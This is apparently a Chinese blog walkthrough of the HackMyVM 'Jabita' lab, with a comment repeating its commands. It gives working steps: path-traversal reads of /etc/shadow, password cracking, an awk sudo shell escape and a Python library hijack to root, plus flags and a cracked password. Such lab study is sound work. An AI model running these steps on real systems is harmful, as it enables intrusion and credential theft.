hmv.jabita

信息搜集

主机扫描

arp-scan -l

端口扫描

 ──(root㉿kali)-[~]
└─# nmap -sV -p- -Pn  192.168.187.170
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-13 05:08 EDT
Nmap scan report for 192.168.187.170
Host is up (0.00052s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
MAC Address: 08:00:27:64:1D:FA (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

路径扫描

 ──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -t 100 -b 403,404 -x php,*  -u http://192.168.187.170
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.187.170
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,*
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/building             (Status: 301) [Size: 321] [--> http://192.168.187.170/building/]

进入路径，发现参数+php，直接怀疑是路径穿越，尝试读取，发现确实存在

尝试读取/home/jack/.ssh/id_rsa,发现什么也没有，于是查看/etc/shadow文件，两文件是互补的，/etc/shadow文件正如他的名字一样，他是passwd文件的一个影子，/etc/shadow文件中的记录行与/etc/passwd中的一一对应，它由pwconv命令根据/etc/passwd中的数据自动产生。但是/etc/shadow文件只有系统管理员才能够进行修改和查看

Linux 中的 passwd 文件对每个人来说都是可读的，因此，加密的密码已转移到称为影子文件的不同文件中。它只能由 root 读取。影子文件也位于 /etc 文件夹内的 /etc/shadow。

既然获得了sahdow和passwd，那么利用工具unshadow，将信息整合破解

unshadow命令基本上会结合/etc/passwd的数据和/etc/shadow的数据，创建1个含有用户名和密码详细信息的文件。

 curl http://192.168.187.170/building/index.php?page=../../../../../../etc/passwd > passwd
 
curl http://192.168.187.170/building/index.php?page=../../../../../../etc/shadow > shadow
 
unshadow passwd shadow > hashes
 
 
──(root㉿kali)-[~/jabita]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE2 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
joaninha         (jack)     
1g 0:00:00:02 DONE (2024-05-13 05:55) 0.4926g/s 1891p/s 1891c/s 1891C/s minerva..dodgers
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

获取shell

 ssh登录
ssh jack@192.168.187.170

搜集发现还有一个用户，无权查看用户目录，于是再次提权

 sudo -l
Matching Defaults entries for jack on jabita:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, listpw=never
 
User jack may run the following commands on jabita:
    (jaba : jaba) NOPASSWD: /usr/bin/awk

AWK的 | go away垃圾箱 (gtfobins.github.io)利用awk提权

 sudo -u jaba awk 'BEGIN {system("/bin/sh")}'
user.txt：2e0942f09699435811c1be613cbc7a39
{1}

提权

 sudo -l
$ sudo -l
Matching Defaults entries for jaba on jabita:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, listpw=never
 
User jaba may run the following commands on jabita:
    (root) NOPASSWD: /usr/bin/python3 /usr/bin/clean.py

发现一个python脚本，直接猜测python库劫持,通过改变python脚本使用模块的内容，来提权

 $ cat /usr/bin/clean.py
import wild                                                                                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                                                                                                         
wild.first()

查找wild模块

 $ find / -name "wild*" 2>/dev/null
/usr/lib/python3.10/wild.py
/usr/lib/python3.10/__pycache__/wild.cpython-310.pyc
查看是否具有可写权限
$ ls -al wild.cpython-310.pyc
-rw-r--r-- 1 root root 163 May 13 10:29 wild.cpython-310.pyc
说明确实可以python库劫持

直接提权

 $ echo import 'os; os.system("/bin/bash")' > /usr/lib/python3.10/wild.py
$ sudo /usr/bin/python3 /usr/bin/clean.py
root@jabita:~# cat root.txt
f4bb4cce1d4ed06fc77ad84ccf70d3fe

知识点

python库劫持

nice to meet you

信息搜集

主机扫描

端口扫描

路径扫描

获取shell

提权

知识点

hmv.hostname

hmv.find

Comments | NOTHING

取消回复

ayanamiii

	──(root㉿kali)-[~]
	└─# nmap -sV -p- -Pn 192.168.187.170
	Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-13 05:08 EDT
	Nmap scan report for 192.168.187.170
	Host is up (0.00052s latency).
	Not shown: 65533 closed tcp ports (reset)
	PORT STATE SERVICE VERSION
	22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
	80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
	MAC Address: 08:00:27:64:1D:FA (Oracle VirtualBox virtual NIC)
	Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

	──(root㉿kali)-[~]
	└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -t 100 -b 403,404 -x php,* -u http://192.168.187.170
	===============================================================
	Gobuster v3.6
	by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
	===============================================================
	[+] Url: http://192.168.187.170
	[+] Method: GET
	[+] Threads: 100
	[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
	[+] Negative Status codes: 403,404
	[+] User Agent: gobuster/3.6
	[+] Extensions: php,*
	[+] Timeout: 10s
	===============================================================
	Starting gobuster in directory enumeration mode
	===============================================================
	/building (Status: 301) [Size: 321] [--> http://192.168.187.170/building/]

	curl http://192.168.187.170/building/index.php?page=../../../../../../etc/passwd > passwd

	curl http://192.168.187.170/building/index.php?page=../../../../../../etc/shadow > shadow

	unshadow passwd shadow > hashes


	──(root㉿kali)-[~/jabita]
	└─# john --wordlist=/usr/share/wordlists/rockyou.txt hashes
	Using default input encoding: UTF-8
	Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE2 2x])
	Cost 1 (iteration count) is 5000 for all loaded hashes
	Will run 2 OpenMP threads
	Press 'q' or Ctrl-C to abort, almost any other key for status
	joaninha (jack)
	1g 0:00:00:02 DONE (2024-05-13 05:55) 0.4926g/s 1891p/s 1891c/s 1891C/s minerva..dodgers
	Use the "--show" option to display all of the cracked passwords reliably
	Session completed.

	sudo -l
	Matching Defaults entries for jack on jabita:
	env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, listpw=never

	User jack may run the following commands on jabita:
	(jaba : jaba) NOPASSWD: /usr/bin/awk

	sudo -u jaba awk 'BEGIN {system("/bin/sh")}'
	user.txt：2e0942f09699435811c1be613cbc7a39
	{1}

	sudo -l
	$ sudo -l
	Matching Defaults entries for jaba on jabita:
	env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, listpw=never

	User jaba may run the following commands on jabita:
	(root) NOPASSWD: /usr/bin/python3 /usr/bin/clean.py

	$ find / -name "wild*" 2>/dev/null
	/usr/lib/python3.10/wild.py
	/usr/lib/python3.10/__pycache__/wild.cpython-310.pyc
	查看是否具有可写权限
	$ ls -al wild.cpython-310.pyc
	-rw-r--r-- 1 root root 163 May 13 10:29 wild.cpython-310.pyc
	说明确实可以python库劫持

	$ echo import 'os; os.system("/bin/bash")' > /usr/lib/python3.10/wild.py
	$ sudo /usr/bin/python3 /usr/bin/clean.py
	root@jabita:~# cat root.txt
	f4bb4cce1d4ed06fc77ad84ccf70d3fe